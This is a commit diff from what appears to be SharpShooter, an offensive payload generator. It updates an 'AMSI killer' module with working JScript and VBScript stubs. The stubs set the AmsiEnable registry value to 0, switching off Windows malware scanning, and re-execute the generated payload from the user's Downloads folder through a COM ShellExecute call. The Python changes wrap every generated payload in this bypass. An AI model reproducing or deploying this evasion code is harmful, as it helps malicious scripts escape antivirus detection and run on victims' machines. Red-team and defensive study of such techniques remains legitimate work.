Updated AMSI Killer Module

mdsecactivebreach · Aug 15, 2018 · ce07c13 · ce07c13
1 parent eb7a06f
commit ce07c13
Show file tree

Hide file tree

Showing 2 changed files with 42 additions and 10 deletions.
diff --git a/SharpShooter.py b/SharpShooter.py
@@ -432,12 +432,16 @@ def run(self, args):
                 print("\n\033[1;31m[!]\033[0;0m Incorrect choice")
                 sys.exit(-1)
 
-
         amsi_bypass = ""
+        outputfile = args.output
+        outputfile_payload = outputfile + "." + file_type
         if args.amsi:
-            amsi_bypass = amsikiller.amsi_stub(file_type, args.amsi)
+            amsi_bypass = amsikiller.amsi_stub(file_type, args.amsi, outputfile_payload)
 
-        template_code = amsi_bypass + template_code
+            if "vb" in file_type or "hta" in file_type:
+                template_code = amsi_bypass + template_code + "\nOn Error Goto 0\nEnd If"
+            else:
+                template_code = amsi_bypass + template_code + "}"
 
         #print(template_code)
 
@@ -473,14 +477,12 @@ def run(self, args):
             payload = harness.replace("%B64PAYLOAD%", payload_encoded)
             payload = payload.replace("%KEY%", "\"%s\"" % (key))
 
-        outputfile = args.output
-
         if (payload_type == 3):
             file_type = "jse"
         elif (payload_type == 5):
             file_type = "vbe"
 
-        outputfile_payload = outputfile + "." + file_type
+
         f = open("output/" + outputfile_payload, 'w')
 
         #print(payload)

diff --git a/modules/amsikiller.py b/modules/amsikiller.py
@@ -1,15 +1,45 @@
 #!/usr/bin/python
 
-def amsi_stub(file_type, technique):
+def amsi_stub(file_type, technique, filename):
 
 
     js_bypass_1 = """\nvar regpath = "HKCU\\\\\Software\\\\Microsoft\\\\Windows Script\\\\Settings\\\\AmsiEnable";
+var exit=0;
+var WinNetwork = new ActiveXObject("WScript.Network");
+var u = WinNetwork.UserName;
 var oWSS = new ActiveXObject("WScript.Shell");
-oWSS.RegWrite(regpath, "0", "REG_DWORD");\n\n"""
+try{
+var r = oWSS.RegRead(regpath);
+}
+catch(e){
+oWSS.RegWrite(regpath, "0", "REG_DWORD");
+var obj = GetObject("new:C08AFD90-F2A1-11D1-8455-00A0C91F3880");
+var j = "c:\\\\users\\\\"+u+"\\\\downloads\\\\%s";
+obj.Document.Application.ShellExecute(j,null,"C:\\Windows\\System32",null,0);
+exit=1;
+}
+if(!exit){
+\n\n""" % (filename)
 
-    vbs_bypass_1 = """\nregpath = "HKCU\Software\Microsoft\Windows Script\Settings\AmsiEnable"
+    vbs_bypass_1 = """\nregpath = "HKCU\\Software\\Microsoft\\Windows Script\\Settings\\AmsiEnable"
+u = CreateObject("WScript.Network").UserName
+e = 0
 Set oWSS = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8")
-oWSS.RegWrite regpath, "0", "REG_DWORD\"\n\n"""
+
+On Error Resume Next
+r = oWSS.RegRead(regpath)
+
+If Err.Number <> 0 Then
+    oWSS.RegWrite regpath, "0", "REG_DWORD"
+    j = "c:\\users\\"+u+"\\downloads\\%s"
+    Set obj = GetObject("new:C08AFD90-F2A1-11D1-8455-00A0C91F3880")
+    obj.Document.Application.ShellExecute j,Null,"C:\\Windows\\System32",Null,0
+    e = 1
+    Err.Clear
+End If
+If Not e Then
+e=1
+\n\n""" % (filename)
 
     if "vb" in file_type or "hta" in file_type:
         amsibypass = vbs_bypass_1